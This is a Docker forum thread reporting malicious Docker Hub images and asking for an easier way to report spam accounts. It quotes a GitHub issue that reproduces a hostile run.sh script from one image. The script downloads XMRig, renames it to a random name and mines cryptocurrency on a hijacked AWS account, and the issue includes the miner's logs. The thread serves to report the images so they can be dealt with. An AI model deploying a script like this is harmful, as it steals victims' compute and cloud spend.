Malicious images from https://hub.docker.com/u/bdkbbdvd

cloudopsworks · April 5, 2025, 4:02am

Hi, this user is posting Malicious Images on DockerHub as well conducting attacks on Cloud Accounts

Best Regards

rimelek · April 5, 2025, 11:11am

Thank you for reporting it. I saw that people also reported Docker Hub accounts on GitHub

github.com/docker/hub-feedback

[gdus1is/lo] Report malicious image

opened 03:13PM - 03 Apr 24 UTC

vanisyd

Hello everyone, I would like to report a malicious image [https://hub.docker.com…/r/gdus1is/lo](https://hub.docker.com/r/gdus1is/lo) (also I see that account contains one more image which is probably created with the same purpose [https://hub.docker.com/r/gdus1is/la](https://hub.docker.com/r/gdus1is/la)) The owner illegally accessed AWS account, created an extra API key and started using ECS service to mine cryptocurrency. I have attached logs of this image and the run.sh file that is executed when the image is started. run.sh > APP=app$(shuf -i 1000000-9999999 -n 1) > wget -q https://github.com/xmrig/xmrig/releases/download/v6.14.1/xmrig-6.14.1-linux-x64.tar.gz > tar -zxf xmrig-6.14.1-linux-x64.tar.gz > cd xmrig-6.14.1 > mv xmrig $APP > chmod +x $APP > ./$APP -a rx/0 -o us.zephyr.herominers.com:1123 -p x -t $(nproc --all) -u ZEPHs8EVgJXb6pqyj5mAc9E8z1Pu6feUYPZMXtprp6oQL8Z7qqQFiPwVv4d3UMuueAhrrcijPkMucWY4DG9aP2XAVZ8YTrNwMhB.gas1 Logs > 2024-04-03 17:59:17 * ABOUT XMRig/6.14.1 gcc/5.4.0 > 2024-04-03 17:59:17 * LIBS libuv/1.41.0 OpenSSL/1.1.1k hwloc/2.4.1 > 2024-04-03 17:59:17 * HUGE PAGES supported > 2024-04-03 17:59:17 * 1GB PAGES unavailable > 2024-04-03 17:59:17 * CPU VirtualApple @ 2.50GHz (1) 64-bit AES > 2024-04-03 17:59:17 L2:0.0 MB L3:0.0 MB 10C/10T NUMA:1 > 2024-04-03 17:59:17 * MEMORY 1.3/7.7 GB (18%) > 2024-04-03 17:59:17 * DONATE 1% > 2024-04-03 17:59:17 * ASSEMBLY auto:intel > 2024-04-03 17:59:17 * POOL #1 us.zephyr.herominers.com:1123 algo rx/0 > 2024-04-03 17:59:17 * COMMANDS hashrate, pause, resume, results, connection > 2024-04-03 17:59:17 * OPENCL disabled > 2024-04-03 17:59:17 * CUDA disabled > 2024-04-03 17:59:17 [2024-04-03 17:59:17.772] net use pool us.zephyr.herominers.com:1123 15.204.46.117 > 2024-04-03 17:59:17 [2024-04-03 17:59:17.776] net new job from us.zephyr.herominers.com:1123 diff 240009 algo rx/0 height 221407 > 2024-04-03 17:59:17 [2024-04-03 17:59:17.777] cpu use argon2 implementation SSSE3 > 2024-04-03 17:59:17 [2024-04-03 17:59:17.803] msr msr kernel module is not available > 2024-04-03 17:59:17 [2024-04-03 17:59:17.803] msr FAILED TO APPLY MSR MOD, HASHRATE WILL BE LOW > 2024-04-03 17:59:17 [2024-04-03 17:59:17.805] randomx init dataset algo rx/0 (10 threads) seed 59789da41f0fcfc7... > 2024-04-03 17:59:17 [2024-04-03 17:59:17.809] randomx allocated 2336 MB (2080+256) huge pages 0% 0/1168 +JIT (3 ms) > 2024-04-03 17:59:23 [2024-04-03 17:59:23.164] randomx dataset ready (5356 ms) > 2024-04-03 17:59:23 [2024-04-03 17:59:23.165] cpu use profile * (10 threads) scratchpad 2048 KB > 2024-04-03 17:59:23 [2024-04-03 17:59:23.170] cpu READY threads 10/10 (10) huge pages 0% 0/10 memory 20480 KB (4 ms)

And I created an roadmap item some years ago for reporting spam accounts

github.com/docker/roadmap

An easy way to report spam accounts and images on Docker Hub

opened 08:41PM - 11 May 22 UTC

rimelek

community_new docker_hub

**Tell us about your request** There are many accounts on Docker Hub with only …pictures, external links to potentially malicious websites, softwares, We should have an easier way to report accounts or images. I would suggest a "Report" button on the page of every accounts and repositories. It could be one button to open a confirmation page with an optional text field to add some explanation or a DropDown list to choose from some preconfigured possible reasons. **Which service(s) is this request for?** Docker Hub **Tell us about the problem you're trying to solve. What are you trying to do, and why is it hard?** There is a topic on the Docker forum with multiple reports. https://forums.docker.com/t/spam-post-on-docker-hub/112271/ I suggested to report these on the Hub Feedback repo where I found an existing issue: https://github.com/docker/hub-feedback/issues/2208 Unfortunately, I can understand people why they don't want to contact the Docker support or open a new issue. If someone realizes an account is a spammer, they just won't pull anything from that account and obviously won't click on anything, so it is mainly not for them but for everyone else. Although, when you search for something, it could be annoying to find multiple spam accounts. **Additional context** Since the user, who reported the issue last time stated it was easy to find spam accounts, I tried to search on the Hub for "download" and I found one very soon. So having a report button is my short term request, bevause I think it is much easier to implement then improving an automatic spam filter or even implementing one from scratch.

As far as I know, there is some progress, but there is no recommended way to report these accounts, so since you already reported here I can share it with Docker, but I could not check the images yet. Can you tell more about how you recognized the images are malicious and that the user attacks cloud accounts?

Topic		Replies	Views
Malicious image reporting (coin miners in Minecraft images) Docker Hub dockerhub , docker	0	474	September 26, 2021
Spam Post on Docker Hub Docker Hub dockerhub	12	1649	February 25, 2023
Is there a repository somewhere containing infected Docker images? Docker Hub dockerhub , docker	0	527	March 5, 2020
Weird pulls on hub docker account Docker Hub	4	1192	January 10, 2022
Strange docker images General	5	1231	May 28, 2019

Malicious images from https://hub.docker.com/u/bdkbbdvd

Related topics